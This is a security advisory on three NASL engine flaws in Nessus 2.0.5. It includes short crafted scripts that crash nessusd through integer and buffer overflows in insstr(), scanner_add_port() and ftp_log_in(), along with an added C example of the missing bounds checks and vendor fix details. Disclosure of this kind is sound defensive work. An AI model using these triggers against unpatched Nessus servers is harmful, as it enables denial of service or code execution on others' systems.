Heads Up, Nessus Exploits.
There exist some vulnerabilities in the NASL scripting engine.
To exploit these flaws, an attacker would need to have a valid Nessus
account as well as the ability to upload arbitrary Nessus plugins to the
Nessus server (this option is disabled by default), or he/she would need to
trick a user somehow into running a specially crafted nasl script.
Note that these issues can NOT be exploited by a tested host to crash
nessusd remotely.
* ISSUE 1 - Integer handling vulnerability in insstr() function
Vulnerability is triggered by a negative fourth argument:
$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);
$ nasl t1.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
[1384](t1.nasl) insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)
* ISSUE 2 - Buffer overflow in scanner_add_port() function
Overflow is triggered by very long 'proto' argument:
$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));
$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)
* ISSUE 3 - Buffer overflow in ftp_log_in() function
Overflow is triggered by very long 'user'/'pass' arguments:
$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user:
crap(data:'A',length:8192));
$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)
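As an added illustration (not Nessus code), the two checks the crashes above lack: signed index validation for an insstr()-style replace (issue 1) and a length check before a caller-supplied argument is copied into a fixed buffer (issues 2 and 3). The insstr semantics assumed here are "return s with s[i1..i2] replaced by pat"; both function names are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical bounds-checked insstr(): copy of s with the characters at
 * positions [i1, i2] (inclusive) replaced by pat. Returns NULL on bad input. */
char *insstr_safe(const char *s, const char *pat, long i1, long i2)
{
    size_t slen = strlen(s);
    /* Indices arrive as signed values: 0xfffffffd in a 32-bit int is -3.
     * Reject negative, reversed or out-of-range indices up front instead
     * of warning and continuing with a wrapped length. */
    if (i1 < 0 || i2 < 0 || i1 > i2 || (size_t)i2 >= slen)
        return NULL;
    size_t plen = strlen(pat);
    size_t tail = slen - (size_t)i2 - 1;       /* characters after i2 */
    size_t out_len = (size_t)i1 + plen + tail;
    char *out = malloc(out_len + 1);
    if (!out)
        return NULL;
    memcpy(out, s, (size_t)i1);
    memcpy(out + i1, pat, plen);
    memcpy(out + i1 + plen, s + i2 + 1, tail);
    out[out_len] = '\0';
    return out;
}

/* Hypothetical length-checked copy of a script-controlled argument (the
 * 'proto', 'user' or 'pass' strings) into a fixed-size buffer: returns 0 and
 * copies nothing when the argument does not fit, instead of overflowing. */
int copy_arg_bounded(char *dst, size_t dst_size, const char *arg)
{
    size_t n = strlen(arg);
    if (n >= dst_size)
        return 0;
    memcpy(dst, arg, n + 1);
    return 1;
}

int main(void)
{
    char proto[16];
    char *r = insstr_safe("aaaaaaaaaaa", "bb", 3, 5);
    printf("%s\n", r ? r : "(rejected)");
    free(r);
    r = insstr_safe("aaaaaaaaaaa", "bb", 3, -3);  /* the advisory's trigger */
    printf("%s\n", r ? r : "(rejected)");
    printf("%d\n", copy_arg_bounded(proto, sizeof proto, "tcp"));
    return 0;
}
```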
III. VERSIONS TESTED
Linux RedHat 7.2
$ nasl -v | grep nasl
nasl 2.0.5
IV. VENDOR STATUS
New nessus 2.0.6 packages fix these issues.
V. WORKAROUND
Make sure the option 'plugins_upload' is set to 'no' in nessusd.conf and
don't run untrusted nasl scripts.
VI. CREDITS
Hank Leininger requested the source code audit for some open-source projects
and for Nessus in particular.
Sir Mordred discovered the issues.
Renaud Deraison fixed them in an hour after being notified.